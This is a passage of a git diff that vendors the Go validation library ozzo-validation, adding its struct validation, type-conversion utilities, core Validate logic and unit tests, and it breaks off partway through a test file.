+	err = v.Validate(100)
+	if assert.NotNil(t, err) {
+		assert.NotEqual(t, "wrong", err.Error())
+	}
+
+	v2 := v.Error("Wrong!")
+	err = v2.Validate("not me")
+	if assert.NotNil(t, err) {
+		assert.Equal(t, "Wrong!", err.Error())
+	}
+}
+
+func TestGetErrorFieldName(t *testing.T) {
+	type A struct {
+		T0 string
+		T1 string `json:"t1"`
+		T2 string `json:"t2,omitempty"`
+		T3 string `json:",omitempty"`
+		T4 string `json:"t4,x1,omitempty"`
+	}
+	tests := []struct {
+		tag   string
+		field string
+		name  string
+	}{
+		{"t1", "T0", "T0"},
+		{"t2", "T1", "t1"},
+		{"t3", "T2", "t2"},
+		{"t4", "T3", "T3"},
+		{"t5", "T4", "t4"},
+	}
+	a := reflect.TypeOf(A{})
+	for _, test := range tests {
+		field, _ := a.FieldByName(test.field)
+		assert.Equal(t, test.name, getErrorFieldName(&field), test.tag)
+	}
+}
diff --git a/vendor/github.com/go-ozzo/ozzo-validation/struct.go b/vendor/github.com/go-ozzo/ozzo-validation/struct.go
new file mode 100644
index 0000000000..2d3a19c34a
--- /dev/null
+++ b/vendor/github.com/go-ozzo/ozzo-validation/struct.go
@@ -0,0 +1,154 @@
+// Copyright 2016 Qiang Xue. All rights reserved.
+// Use of this source code is governed by a MIT-style
+// license that can be found in the LICENSE file.
+
+package validation
+
+import (
+	"errors"
+	"fmt"
+	"reflect"
+	"strings"
+)
+
+var (
+	// StructPointerError is the error that a struct being validated is not specified as a pointer.
+	StructPointerError = errors.New("only a pointer to a struct can be validated")
+)
+
+type (
+	// FieldPointerError is the error that a field is not specified as a pointer.
+	FieldPointerError int
+
+	// FieldNotFoundError is the error that a field cannot be found in the struct.
+	FieldNotFoundError int
+
+	// FieldRules represents a rule set associated with a struct field.
+	FieldRules struct {
+		fieldPtr interface{}
+		rules    []Rule
+	}
+)
+
+// Error returns the error string of FieldPointerError.
+func (e FieldPointerError) Error() string {
+	return fmt.Sprintf("field #%v must be specified as a pointer", int(e))
+}
+
+// Error returns the error string of FieldNotFoundError.
+func (e FieldNotFoundError) Error() string {
+	return fmt.Sprintf("field #%v cannot be found in the struct", int(e))
+}
+
+// ValidateStruct validates a struct by checking the specified struct fields against the corresponding validation rules.
+// Note that the struct being validated must be specified as a pointer to it. If the pointer is nil, it is considered valid.
+// Use Field() to specify struct fields that need to be validated. Each Field() call specifies a single field which
+// should be specified as a pointer to the field. A field can be associated with multiple rules.
+// For example,
+//
+//    value := struct {
+//        Name  string
+//        Value string
+//    }{"name", "demo"}
+//    err := validation.ValidateStruct(&value,
+//         validation.Field(&a.Name, validation.Required),
+//         validation.Field(&a.Value, validation.Required, validation.Length(5, 10)),
+//    )
+//    fmt.Println(err)
+//    // Value: the length must be between 5 and 10.
+//
+// An error will be returned if validation fails.
+func ValidateStruct(structPtr interface{}, fields ...*FieldRules) error {
+	value := reflect.ValueOf(structPtr)
+	if value.Kind() != reflect.Ptr || !value.IsNil() && value.Elem().Kind() != reflect.Struct {
+		// must be a pointer to a struct
+		return NewInternalError(StructPointerError)
+	}
+	if value.IsNil() {
+		// treat a nil struct pointer as valid
+		return nil
+	}
+	value = value.Elem()
+
+	errs := Errors{}
+
+	for i, fr := range fields {
+		fv := reflect.ValueOf(fr.fieldPtr)
+		if fv.Kind() != reflect.Ptr {
+			return NewInternalError(FieldPointerError(i))
+		}
+		ft := findStructField(value, fv)
+		if ft == nil {
+			return NewInternalError(FieldNotFoundError(i))
+		}
+		if err := Validate(fv.Elem().Interface(), fr.rules...); err != nil {
+			if ie, ok := err.(InternalError); ok && ie.InternalError() != nil{
+				return err
+			}
+			if ft.Anonymous {
+				// merge errors from anonymous struct field
+				if es, ok := err.(Errors); ok {
+					for name, value := range es {
+						errs[name] = value
+					}
+					continue
+				}
+			}
+			errs[getErrorFieldName(ft)] = err
+		}
+	}
+
+	if len(errs) > 0 {
+		return errs
+	}
+	return nil
+}
+
+// Field specifies a struct field and the corresponding validation rules.
+// The struct field must be specified as a pointer to it.
+func Field(fieldPtr interface{}, rules ...Rule) *FieldRules {
+	return &FieldRules{
+		fieldPtr: fieldPtr,
+		rules:    rules,
+	}
+}
+
+// findStructField looks for a field in the given struct.
+// The field being looked for should be a pointer to the actual struct field.
+// If found, the field info will be returned. Otherwise, nil will be returned.
+func findStructField(structValue reflect.Value, fieldValue reflect.Value) *reflect.StructField {
+	ptr := fieldValue.Pointer()
+	for i := structValue.NumField() - 1; i >= 0; i-- {
+		sf := structValue.Type().Field(i)
+		if ptr == structValue.Field(i).UnsafeAddr() {
+			// do additional type comparison because it's possible that the address of
+			// an embedded struct is the same as the first field of the embedded struct
+			if sf.Type == fieldValue.Elem().Type() {
+				return &sf
+			}
+		}
+		if sf.Anonymous {
+			// delve into anonymous struct to look for the field
+			fi := structValue.Field(i)
+			if sf.Type.Kind() == reflect.Ptr {
+				fi = fi.Elem()
+			}
+			if fi.Kind() == reflect.Struct {
+				if f := findStructField(fi, fieldValue); f != nil {
+					return f
+				}
+			}
+		}
+	}
+	return nil
+}
+
+// getErrorFieldName returns the name that should be used to represent the validation error of a struct field.
+func getErrorFieldName(f *reflect.StructField) string {
+	if tag := f.Tag.Get(ErrorTag); tag != "" {
+		if cps := strings.SplitN(tag, ",", 2); cps[0] != "" {
+			return cps[0]
+		}
+	}
+	return f.Name
+}
diff --git a/vendor/github.com/go-ozzo/ozzo-validation/struct_test.go b/vendor/github.com/go-ozzo/ozzo-validation/struct_test.go
new file mode 100644
index 0000000000..97c7a4f1ac
--- /dev/null
+++ b/vendor/github.com/go-ozzo/ozzo-validation/struct_test.go
@@ -0,0 +1,137 @@
+// Copyright 2016 Qiang Xue. All rights reserved.
+// Use of this source code is governed by a MIT-style
+// license that can be found in the LICENSE file.
+
+package validation
+
+import (
+	"reflect"
+	"testing"
+
+	"github.com/stretchr/testify/assert"
+)
+
+type Struct1 struct {
+	Field1 int
+	Field2 *int
+	Field3 []int
+	Field4 [4]int
+	field5 int
+	Struct2
+	S1 *Struct2
+	S2 Struct2
+}
+
+type Struct2 struct {
+	Field21 string
+	Field22 string
+}
+
+type Struct3 struct {
+	*Struct2
+	S1 string
+}
+
+func TestFindStructField(t *testing.T) {
+	var s1 Struct1
+	v1 := reflect.ValueOf(&s1).Elem()
+	assert.NotNil(t, findStructField(v1, reflect.ValueOf(&s1.Field1)))
+	assert.Nil(t, findStructField(v1, reflect.ValueOf(s1.Field2)))
+	assert.NotNil(t, findStructField(v1, reflect.ValueOf(&s1.Field2)))
+	assert.Nil(t, findStructField(v1, reflect.ValueOf(s1.Field3)))
+	assert.NotNil(t, findStructField(v1, reflect.ValueOf(&s1.Field3)))
+	assert.NotNil(t, findStructField(v1, reflect.ValueOf(&s1.Field4)))
+	assert.NotNil(t, findStructField(v1, reflect.ValueOf(&s1.field5)))
+	assert.NotNil(t, findStructField(v1, reflect.ValueOf(&s1.Struct2)))
+	assert.Nil(t, findStructField(v1, reflect.ValueOf(s1.S1)))
+	assert.NotNil(t, findStructField(v1, reflect.ValueOf(&s1.S1)))
+	assert.NotNil(t, findStructField(v1, reflect.ValueOf(&s1.Field21)))
+	assert.NotNil(t, findStructField(v1, reflect.ValueOf(&s1.Field22)))
+	assert.NotNil(t, findStructField(v1, reflect.ValueOf(&s1.Struct2.Field22)))
+	s2 := reflect.ValueOf(&s1.Struct2).Elem()
+	assert.NotNil(t, findStructField(s2, reflect.ValueOf(&s1.Field21)))
+	assert.NotNil(t, findStructField(s2, reflect.ValueOf(&s1.Struct2.Field21)))
+	assert.NotNil(t, findStructField(s2, reflect.ValueOf(&s1.Struct2.Field22)))
+	s3 := Struct3{
+		Struct2: &Struct2{},
+	}
+	v3 := reflect.ValueOf(&s3).Elem()
+	assert.NotNil(t, findStructField(v3, reflect.ValueOf(&s3.Struct2)))
+	assert.NotNil(t, findStructField(v3, reflect.ValueOf(&s3.Field21)))
+}
+
+func TestValidateStruct(t *testing.T) {
+	var m0 *Model1
+	m1 := Model1{A: "abc", B: "xyz", c: "abc", G: "xyz"}
+	m2 := Model1{E: String123("xyz")}
+	m3 := Model2{}
+	m4 := Model2{M3: Model3{A: "abc"}, Model3: Model3{A: "abc"}}
+	m5 := Model2{Model3: Model3{A: "internal"}}
+	tests := []struct {
+		tag   string
+		model interface{}
+		rules []*FieldRules
+		err   string
+	}{
+		// empty rules
+		{"t1.1", &m1, []*FieldRules{}, ""},
+		{"t1.2", &m1, []*FieldRules{Field(&m1.A), Field(&m1.B)}, ""},
+		// normal rules
+		{"t2.1", &m1, []*FieldRules{Field(&m1.A, &validateAbc{}), Field(&m1.B, &validateXyz{})}, ""},
+		{"t2.2", &m1, []*FieldRules{Field(&m1.A, &validateXyz{}), Field(&m1.B, &validateAbc{})}, "A: error xyz; B: error abc."},
+		{"t2.3", &m1, []*FieldRules{Field(&m1.A, &validateXyz{}), Field(&m1.c, &validateXyz{})}, "A: error xyz; c: error xyz."},
+		{"t2.4", &m1, []*FieldRules{Field(&m1.D, Length(0, 5))}, ""},
+		{"t2.5", &m1, []*FieldRules{Field(&m1.F, Length(0, 5))}, ""},
+		// non-struct pointer
+		{"t3.1", m1, []*FieldRules{}, StructPointerError.Error()},
+		{"t3.2", nil, []*FieldRules{}, StructPointerError.Error()},
+		{"t3.3", m0, []*FieldRules{}, ""},
+		{"t3.4", &m0, []*FieldRules{}, StructPointerError.Error()},
+		// invalid field spec
+		{"t4.1", &m1, []*FieldRules{Field(m1)}, FieldPointerError(0).Error()},
+		{"t4.2", &m1, []*FieldRules{Field(&m1)}, FieldNotFoundError(0).Error()},
+		// struct tag
+		{"t5.1", &m1, []*FieldRules{Field(&m1.G, &validateAbc{})}, "g: error abc."},
+		// validatable field
+		{"t6.1", &m2, []*FieldRules{Field(&m2.E)}, "E: error 123."},
+		{"t6.2", &m2, []*FieldRules{Field(&m2.E, Skip)}, ""},
+		// Required, NotNil
+		{"t7.1", &m2, []*FieldRules{Field(&m2.F, Required)}, "F: cannot be blank."},
+		{"t7.2", &m2, []*FieldRules{Field(&m2.F, NotNil)}, "F: is required."},
+		{"t7.3", &m2, []*FieldRules{Field(&m2.E, Required, Skip)}, ""},
+		{"t7.4", &m2, []*FieldRules{Field(&m2.E, NotNil, Skip)}, ""},
+		// embedded structs
+		{"t8.1", &m3, []*FieldRules{Field(&m3.M3, Skip)}, ""},
+		{"t8.2", &m3, []*FieldRules{Field(&m3.M3)}, "M3: (A: error abc.)."},
+		{"t8.3", &m3, []*FieldRules{Field(&m3.Model3, Skip)}, ""},
+		{"t8.4", &m3, []*FieldRules{Field(&m3.Model3)}, "A: error abc."},
+		{"t8.5", &m4, []*FieldRules{Field(&m4.M3)}, ""},
+		{"t8.6", &m4, []*FieldRules{Field(&m4.Model3)}, ""},
+		{"t8.7", &m3, []*FieldRules{Field(&m3.A, Required), Field(&m3.B, Required)}, "A: cannot be blank; B: cannot be blank."},
+		{"t8.8", &m3, []*FieldRules{Field(&m4.A, Required)}, "field #0 cannot be found in the struct"},
+		// internal error
+		{"t9.1", &m5, []*FieldRules{Field(&m5.A, &validateAbc{}), Field(&m5.B, Required), Field(&m5.A, &validateInternalError{})}, "error internal"},
+	}
+	for _, test := range tests {
+		err := ValidateStruct(test.model, test.rules...)
+		assertError(t, test.err, err, test.tag)
+	}
+
+	// embedded struct
+	err := Validate(&m3)
+	if assert.NotNil(t, err) {
+		assert.Equal(t, "A: error abc.", err.Error())
+	}
+
+	a := struct {
+		Name  string
+		Value string
+	}{"name", "demo"}
+	err = ValidateStruct(&a,
+		Field(&a.Name, Required),
+		Field(&a.Value, Required, Length(5, 10)),
+	)
+	if assert.NotNil(t, err) {
+		assert.Equal(t, "Value: the length must be between 5 and 10.", err.Error())
+	}
+}
diff --git a/vendor/github.com/go-ozzo/ozzo-validation/util.go b/vendor/github.com/go-ozzo/ozzo-validation/util.go
new file mode 100644
index 0000000000..2c1c5881c3
--- /dev/null
+++ b/vendor/github.com/go-ozzo/ozzo-validation/util.go
@@ -0,0 +1,157 @@
+// Copyright 2016 Qiang Xue. All rights reserved.
+// Use of this source code is governed by a MIT-style
+// license that can be found in the LICENSE file.
+
+package validation
+
+import (
+	"database/sql/driver"
+	"errors"
+	"fmt"
+	"reflect"
+)
+
+var (
+	bytesType  = reflect.TypeOf([]byte(nil))
+	valuerType = reflect.TypeOf((*driver.Valuer)(nil)).Elem()
+)
+
+// EnsureString ensures the given value is a string.
+// If the value is a byte slice, it will be typecast into a string.
+// An error is returned otherwise.
+func EnsureString(value interface{}) (string, error) {
+	v := reflect.ValueOf(value)
+	if v.Kind() == reflect.String {
+		return v.String(), nil
+	}
+	if v.Type() == bytesType {
+		return string(v.Interface().([]byte)), nil
+	}
+	return "", errors.New("must be either a string or byte slice")
+}
+
+// StringOrBytes typecasts a value into a string or byte slice.
+// Boolean flags are returned to indicate if the typecasting succeeds or not.
+func StringOrBytes(value interface{}) (isString bool, str string, isBytes bool, bs []byte) {
+	v := reflect.ValueOf(value)
+	if v.Kind() == reflect.String {
+		str = v.String()
+		isString = true
+	} else if v.Kind() == reflect.Slice && v.Type() == bytesType {
+		bs = v.Interface().([]byte)
+		isBytes = true
+	}
+	return
+}
+
+// LengthOfValue returns the length of a value that is a string, slice, map, or array.
+// An error is returned for all other types.
+func LengthOfValue(value interface{}) (int, error) {
+	v := reflect.ValueOf(value)
+	switch v.Kind() {
+	case reflect.String, reflect.Slice, reflect.Map, reflect.Array:
+		return v.Len(), nil
+	}
+	return 0, fmt.Errorf("cannot get the length of %v", v.Kind())
+}
+
+// ToInt converts the given value to an int64.
+// An error is returned for all incompatible types.
+func ToInt(value interface{}) (int64, error) {
+	v := reflect.ValueOf(value)
+	switch v.Kind() {
+	case reflect.Int, reflect.Int8, reflect.Int16, reflect.Int32, reflect.Int64:
+		return v.Int(), nil
+	}
+	return 0, fmt.Errorf("cannot convert %v to int64", v.Kind())
+}
+
+// ToUint converts the given value to an uint64.
+// An error is returned for all incompatible types.
+func ToUint(value interface{}) (uint64, error) {
+	v := reflect.ValueOf(value)
+	switch v.Kind() {
+	case reflect.Uint, reflect.Uint8, reflect.Uint16, reflect.Uint32, reflect.Uint64, reflect.Uintptr:
+		return v.Uint(), nil
+	}
+	return 0, fmt.Errorf("cannot convert %v to uint64", v.Kind())
+}
+
+// ToFloat converts the given value to a float64.
+// An error is returned for all incompatible types.
+func ToFloat(value interface{}) (float64, error) {
+	v := reflect.ValueOf(value)
+	switch v.Kind() {
+	case reflect.Float32, reflect.Float64:
+		return v.Float(), nil
+	}
+	return 0, fmt.Errorf("cannot convert %v to float64", v.Kind())
+}
+
+// IsEmpty checks if a value is empty or not.
+// A value is considered empty if
+// - integer, float: zero
+// - bool: false
+// - string, array: len() == 0
+// - slice, map: nil or len() == 0
+// - interface, pointer: nil or the referenced value is empty
+func IsEmpty(value interface{}) bool {
+	v := reflect.ValueOf(value)
+	switch v.Kind() {
+	case reflect.String, reflect.Array, reflect.Map, reflect.Slice:
+		return v.Len() == 0
+	case reflect.Bool:
+		return !v.Bool()
+	case reflect.Int, reflect.Int8, reflect.Int16, reflect.Int32, reflect.Int64:
+		return v.Int() == 0
+	case reflect.Uint, reflect.Uint8, reflect.Uint16, reflect.Uint32, reflect.Uint64, reflect.Uintptr:
+		return v.Uint() == 0
+	case reflect.Float32, reflect.Float64:
+		return v.Float() == 0
+	case reflect.Invalid:
+		return true
+	case reflect.Interface, reflect.Ptr:
+		if v.IsNil() {
+			return true
+		}
+		return IsEmpty(v.Elem().Interface())
+	}
+
+	return false
+}
+
+// Indirect returns the value that the given interface or pointer references to.
+// If the value implements driver.Valuer, it will deal with the value returned by
+// the Value() method instead. A boolean value is also returned to indicate if
+// the value is nil or not (only applicable to interface, pointer, map, and slice).
+// If the value is neither an interface nor a pointer, it will be returned back.
+func Indirect(value interface{}) (interface{}, bool) {
+	rv := reflect.ValueOf(value)
+	kind := rv.Kind()
+	switch kind {
+	case reflect.Invalid:
+		return nil, true
+	case reflect.Ptr, reflect.Interface:
+		if rv.IsNil() {
+			return nil, true
+		}
+		return Indirect(rv.Elem().Interface())
+	case reflect.Slice, reflect.Map, reflect.Func, reflect.Chan:
+		if rv.IsNil() {
+			return nil, true
+		}
+	}
+
+	if rv.Type().Implements(valuerType) {
+		return indirectValuer(value.(driver.Valuer))
+	}
+
+	return value, false
+}
+
+func indirectValuer(valuer driver.Valuer) (interface{}, bool) {
+	if value, err := valuer.Value(); value != nil && err == nil {
+		return Indirect(value)
+	}
+	return nil, true
+}
diff --git a/vendor/github.com/go-ozzo/ozzo-validation/util_test.go b/vendor/github.com/go-ozzo/ozzo-validation/util_test.go
new file mode 100644
index 0000000000..28a6d5161a
--- /dev/null
+++ b/vendor/github.com/go-ozzo/ozzo-validation/util_test.go
@@ -0,0 +1,293 @@
+// Copyright 2016 Qiang Xue. All rights reserved.
+// Use of this source code is governed by a MIT-style
+// license that can be found in the LICENSE file.
+
+package validation
+
+import (
+	"testing"
+
+	"database/sql"
+
+	"github.com/stretchr/testify/assert"
+)
+
+func TestEnsureString(t *testing.T) {
+	str := "abc"
+	bytes := []byte("abc")
+
+	tests := []struct {
+		tag      string
+		value    interface{}
+		expected string
+		hasError bool
+	}{
+		{"t1", "abc", "abc", false},
+		{"t2", &str, "", true},
+		{"t3", bytes, "abc", false},
+		{"t4", &bytes, "", true},
+		{"t5", 100, "", true},
+	}
+	for _, test := range tests {
+		s, err := EnsureString(test.value)
+		if test.hasError {
+			assert.NotNil(t, err, test.tag)
+		} else {
+			assert.Nil(t, err, test.tag)
+			assert.Equal(t, test.expected, s, test.tag)
+		}
+	}
+}
+
+type MyString string
+
+func TestStringOrBytes(t *testing.T) {
+	str := "abc"
+	bytes := []byte("abc")
+	var str2 string
+	var bytes2 []byte
+	var str3 MyString = "abc"
+	var str4 *string
+
+	tests := []struct {
+		tag      string
+		value    interface{}
+		str      string
+		bs       []byte
+		isString bool
+		isBytes  bool
+	}{
+		{"t1", str, "abc", nil, true, false},
+		{"t2", &str, "", nil, false, false},
+		{"t3", bytes, "", []byte("abc"), false, true},
+		{"t4", &bytes, "", nil, false, false},
+		{"t5", 100, "", nil, false, false},
+		{"t6", str2, "", nil, true, false},
+		{"t7", &str2, "", nil, false, false},
+		{"t8", bytes2, "", nil, false, true},
+		{"t9", &bytes2, "", nil, false, false},
+		{"t10", str3, "abc", nil, true, false},
+		{"t11", &str3, "", nil, false, false},
+		{"t12", str4, "", nil, false, false},
+	}
+	for _, test := range tests {
+		isString, str, isBytes, bs := StringOrBytes(test.value)
+		assert.Equal(t, test.str, str, test.tag)
+		assert.Equal(t, test.bs, bs, test.tag)
+		assert.Equal(t, test.isString, isString, test.tag)
+		assert.Equal(t, test.isBytes, isBytes, test.tag)
+	}
+}
+
+func TestLengthOfValue(t *testing.T) {
+	var a [3]int
+
+	tests := []struct {
+		tag    string
+		value  interface{}
+		length int
+		err    string
+	}{
+		{"t1", "abc", 3, ""},
+		{"t2", []int{1, 2}, 2, ""},
+		{"t3", map[string]int{"A": 1, "B": 2}, 2, ""},
+		{"t4", a, 3, ""},
+		{"t5", &a, 0, "cannot get the length of ptr"},
+		{"t6", 123, 0, "cannot get the length of int"},
+	}
+
+	for _, test := range tests {
+		l, err := LengthOfValue(test.value)
+		assert.Equal(t, test.length, l, test.tag)
+		assertError(t, test.err, err, test.tag)
+	}
+}
+
+func TestToInt(t *testing.T) {
+	var a int
+
+	tests := []struct {
+		tag    string
+		value  interface{}
+		result int64
+		err    string
+	}{
+		{"t1", 1, 1, ""},
+		{"t2", int8(1), 1, ""},
+		{"t3", int16(1), 1, ""},
+		{"t4", int32(1), 1, ""},
+		{"t5", int64(1), 1, ""},
+		{"t6", &a, 0, "cannot convert ptr to int64"},
+		{"t7", uint(1), 0, "cannot convert uint to int64"},
+		{"t8", float64(1), 0, "cannot convert float64 to int64"},
+		{"t9", "abc", 0, "cannot convert string to int64"},
+		{"t10", []int{1, 2}, 0, "cannot convert slice to int64"},
+		{"t11", map[string]int{"A": 1}, 0, "cannot convert map to int64"},
+	}
+
+	for _, test := range tests {
+		l, err := ToInt(test.value)
+		assert.Equal(t, test.result, l, test.tag)
+		assertError(t, test.err, err, test.tag)
+	}
+}
+
+func TestToUint(t *testing.T) {
+	var a int
+	var b uint
+
+	tests := []struct {
+		tag    string
+		value  interface{}
+		result uint64
+		err    string
+	}{
+		{"t1", uint(1), 1, ""},
+		{"t2", uint8(1), 1, ""},
+		{"t3", uint16(1), 1, ""},
+		{"t4", uint32(1), 1, ""},
+		{"t5", uint64(1), 1, ""},
+		{"t6", 1, 0, "cannot convert int to uint64"},
+		{"t7", &a, 0, "cannot convert ptr to uint64"},
+		{"t8", &b, 0, "cannot convert ptr to uint64"},
+		{"t9", float64(1), 0, "cannot convert float64 to uint64"},
+		{"t10", "abc", 0, "cannot convert string to uint64"},
+		{"t11", []int{1, 2}, 0, "cannot convert slice to uint64"},
+		{"t12", map[string]int{"A": 1}, 0, "cannot convert map to uint64"},
+	}
+
+	for _, test := range tests {
+		l, err := ToUint(test.value)
+		assert.Equal(t, test.result, l, test.tag)
+		assertError(t, test.err, err, test.tag)
+	}
+}
+
+func TestToFloat(t *testing.T) {
+	var a int
+	var b uint
+
+	tests := []struct {
+		tag    string
+		value  interface{}
+		result float64
+		err    string
+	}{
+		{"t1", float32(1), 1, ""},
+		{"t2", float64(1), 1, ""},
+		{"t3", 1, 0, "cannot convert int to float64"},
+		{"t4", uint(1), 0, "cannot convert uint to float64"},
+		{"t5", &a, 0, "cannot convert ptr to float64"},
+		{"t6", &b, 0, "cannot convert ptr to float64"},
+		{"t7", "abc", 0, "cannot convert string to float64"},
+		{"t8", []int{1, 2}, 0, "cannot convert slice to float64"},
+		{"t9", map[string]int{"A": 1}, 0, "cannot convert map to float64"},
+	}
+
+	for _, test := range tests {
+		l, err := ToFloat(test.value)
+		assert.Equal(t, test.result, l, test.tag)
+		assertError(t, test.err, err, test.tag)
+	}
+}
+
+func TestIsEmpty(t *testing.T) {
+	var s1 string
+	var s2 string = "a"
+	var s3 *string
+	s4 := struct{}{}
+	tests := []struct {
+		tag   string
+		value interface{}
+		empty bool
+	}{
+		// nil
+		{"t0", nil, true},
+		// string
+		{"t1.1", "", true},
+		{"t1.2", "1", false},
+		{"t1.3", MyString(""), true},
+		{"t1.4", MyString("1"), false},
+		// slice
+		{"t2.1", []byte(""), true},
+		{"t2.2", []byte("1"), false},
+		// map
+		{"t3.1", map[string]int{}, true},
+		{"t3.2", map[string]int{"a": 1}, false},
+		// bool
+		{"t4.1", false, true},
+		{"t4.2", true, false},
+		// int
+		{"t5.1", int(0), true},
+		{"t5.2", int8(0), true},
+		{"t5.3", int16(0), true},
+		{"t5.4", int32(0), true},
+		{"t5.5", int64(0), true},
+		{"t5.6", int(1), false},
+		{"t5.7", int8(1), false},
+		{"t5.8", int16(1), false},
+		{"t5.9", int32(1), false},
+		{"t5.10", int64(1), false},
+		// uint
+		{"t6.1", uint(0), true},
+		{"t6.2", uint8(0), true},
+		{"t6.3", uint16(0), true},
+		{"t6.4", uint32(0), true},
+		{"t6.5", uint64(0), true},
+		{"t6.6", uint(1), false},
+		{"t6.7", uint8(1), false},
+		{"t6.8", uint16(1), false},
+		{"t6.9", uint32(1), false},
+		{"t6.10", uint64(1), false},
+		// float
+		{"t7.1", float32(0), true},
+		{"t7.2", float64(0), true},
+		{"t7.3", float32(1), false},
+		{"t7.4", float64(1), false},
+		// interface, ptr
+		{"t8.1", &s1, true},
+		{"t8.2", &s2, false},
+		{"t8.3", s3, true},
+		// struct
+		{"t9.1", s4, false},
+		{"t9.2", &s4, false},
+	}
+
+	for _, test := range tests {
+		empty := IsEmpty(test.value)
+		assert.Equal(t, test.empty, empty, test.tag)
+	}
+}
+
+func TestIndirect(t *testing.T) {
+	var a int = 100
+	var b *int
+	var c *sql.NullInt64
+
+	tests := []struct {
+		tag    string
+		value  interface{}
+		result interface{}
+		isNil  bool
+	}{
+		{"t1", 100, 100, false},
+		{"t2", &a, 100, false},
+		{"t3", b, nil, true},
+		{"t4", nil, nil, true},
+		{"t5", sql.NullInt64{Int64: 0, Valid: false}, nil, true},
+		{"t6", sql.NullInt64{Int64: 1, Valid: false}, nil, true},
+		{"t7", &sql.NullInt64{Int64: 0, Valid: false}, nil, true},
+		{"t8", &sql.NullInt64{Int64: 1, Valid: false}, nil, true},
+		{"t9", sql.NullInt64{Int64: 0, Valid: true}, int64(0), false},
+		{"t10", sql.NullInt64{Int64: 1, Valid: true}, int64(1), false},
+		{"t11", &sql.NullInt64{Int64: 0, Valid: true}, int64(0), false},
+		{"t12", &sql.NullInt64{Int64: 1, Valid: true}, int64(1), false},
+		{"t13", c, nil, true},
+	}
+
+	for _, test := range tests {
+		result, isNil := Indirect(test.value)
+		assert.Equal(t, test.result, result, test.tag)
+		assert.Equal(t, test.isNil, isNil, test.tag)
+	}
+}
diff --git a/vendor/github.com/go-ozzo/ozzo-validation/validation.go b/vendor/github.com/go-ozzo/ozzo-validation/validation.go
new file mode 100644
index 0000000000..1633258178
--- /dev/null
+++ b/vendor/github.com/go-ozzo/ozzo-validation/validation.go
@@ -0,0 +1,133 @@
+// Copyright 2016 Qiang Xue. All rights reserved.
+// Use of this source code is governed by a MIT-style
+// license that can be found in the LICENSE file.
+
+// Package validation provides configurable and extensible rules for validating data of various types.
+package validation
+
+import (
+	"fmt"
+	"reflect"
+	"strconv"
+)
+
+type (
+	// Validatable is the interface indicating the type implementing it supports data validation.
+	Validatable interface {
+		// Validate validates the data and returns an error if validation fails.
+		Validate() error
+	}
+
+	// Rule represents a validation rule.
+	Rule interface {
+		// Validate validates a value and returns a value if validation fails.
+		Validate(value interface{}) error
+	}
+
+	// RuleFunc represents a validator function.
+	// You may wrap it as a Rule by calling By().
+	RuleFunc func(value interface{}) error
+)
+
+var (
+	// ErrorTag is the struct tag name used to customize the error field name for a struct field.
+	ErrorTag = "json"
+
+	// Skip is a special validation rule that indicates all rules following it should be skipped.
+	Skip = &skipRule{}
+
+	validatableType = reflect.TypeOf((*Validatable)(nil)).Elem()
+)
+
+// Validate validates the given value and returns the validation error, if any.
+//
+// Validate performs validation using the following steps:
+// - validate the value against the rules passed in as parameters
+// - if the value is a map and the map values implement `Validatable`, call `Validate` of every map value
+// - if the value is a slice or array whose values implement `Validatable`, call `Validate` of every element
+func Validate(value interface{}, rules ...Rule) error {
+	for _, rule := range rules {
+		if _, ok := rule.(*skipRule); ok {
+			return nil
+		}
+		if err := rule.Validate(value); err != nil {
+			return err
+		}
+	}
+
+	rv := reflect.ValueOf(value)
+	if (rv.Kind() == reflect.Ptr || rv.Kind() == reflect.Interface) && rv.IsNil() {
+		return nil
+	}
+
+	if v, ok := value.(Validatable); ok {
+		return v.Validate()
+	}
+
+	switch rv.Kind() {
+	case reflect.Map:
+		if rv.Type().Elem().Implements(validatableType) {
+			return validateMap(rv)
+		}
+	case reflect.Slice, reflect.Array:
+		if rv.Type().Elem().Implements(validatableType) {
+			return validateSlice(rv)
+		}
+	case reflect.Ptr, reflect.Interface:
+		return Validate(rv.Elem().Interface())
+	}
+
+	return nil
+}
+
+// validateMap validates a map of validatable elements
+func validateMap(rv reflect.Value) error {
+	errs := Errors{}
+	for _, key := range rv.MapKeys() {
+		if mv := rv.MapIndex(key).Interface(); mv != nil {
+			if err := mv.(Validatable).Validate(); err != nil {
+				errs[fmt.Sprintf("%v", key.Interface())] = err
+			}
+		}
+	}
+	if len(errs) > 0 {
+		return errs
+	}
+	return nil
+}
+
+// validateMap validates a slice/array of validatable elements
+func validateSlice(rv reflect.Value) error {
+	errs := Errors{}
+	l := rv.Len()
+	for i := 0; i < l; i++ {
+		if ev := rv.Index(i).Interface(); ev != nil {
+			if err := ev.(Validatable).Validate(); err != nil {
+				errs[strconv.Itoa(i)] = err
+			}
+		}
+	}
+	if len(errs) > 0 {
+		return errs
+	}
+	return nil
+}
+
+type skipRule struct{}
+
+func (r *skipRule) Validate(interface{}) error {
+	return nil
+}
+
+type inlineRule struct {
+	f RuleFunc
+}
+
+func (r *inlineRule) Validate(value interface{}) error {
+	return r.f(value)
+}
+
+// By wraps a RuleFunc into a Rule.
+func By(f RuleFunc) Rule {
+	return &inlineRule{f}
+}
diff --git a/vendor/github.com/go-ozzo/ozzo-validation/validation_test.go b/vendor/github.com/go-ozzo/ozzo-validation/validation_test.go
new file mode 100644
index 0000000000..27ac6cb764
--- /dev/null
+++ b/vendor/github.com/go-ozzo/ozzo-validation/validation_test.go
@@ -0,0 +1,145 @@
+// Copyright 2016 Qiang Xue. All rights reserved.
+// Use of this source code is governed by a MIT-style
+// license that can be found in the LICENSE file.
+
+package validation
+
+import (
+	"errors"
+	"strings"
+	"testing"
+
+	"github.com/stretchr/testify/assert"
+)
+
+func TestValidate(t *testing.T) {
+	slice := []String123{String123("abc"), String123("123"), String123("xyz")}
+	mp := map[string]String123{"c": String123("abc"), "b": String123("123"), "a": String123("xyz")}
+	tests := []struct {
+		tag   string
+		value interface{}
+		err   string
+	}{
+		{"t1", 123, ""},
+		{"t2", String123("123"), ""},
+		{"t3", String123("abc"), "error 123"},
+		{"t4", []String123{}, ""},
+		{"t5", slice, "0: error 123; 2: error 123."},
+		{"t6", &slice, "0: error 123; 2: error 123."},
+		{"t7", mp, "a: error 123; c: error 123."},
+		{"t8", &mp, "a: error 123; c: error 123."},
+		{"t9", map[string]String123{}, ""},
+	}
+	for _, test := range tests {
+		err := Validate(test.value)
+		assertError(t, test.err, err, test.tag)
+	}
+
+	// with rules
+	err := Validate("123", &validateAbc{}, &validateXyz{})
+	if assert.NotNil(t, err) {
+		assert.Equal(t, "error abc", err.Error())
+	}
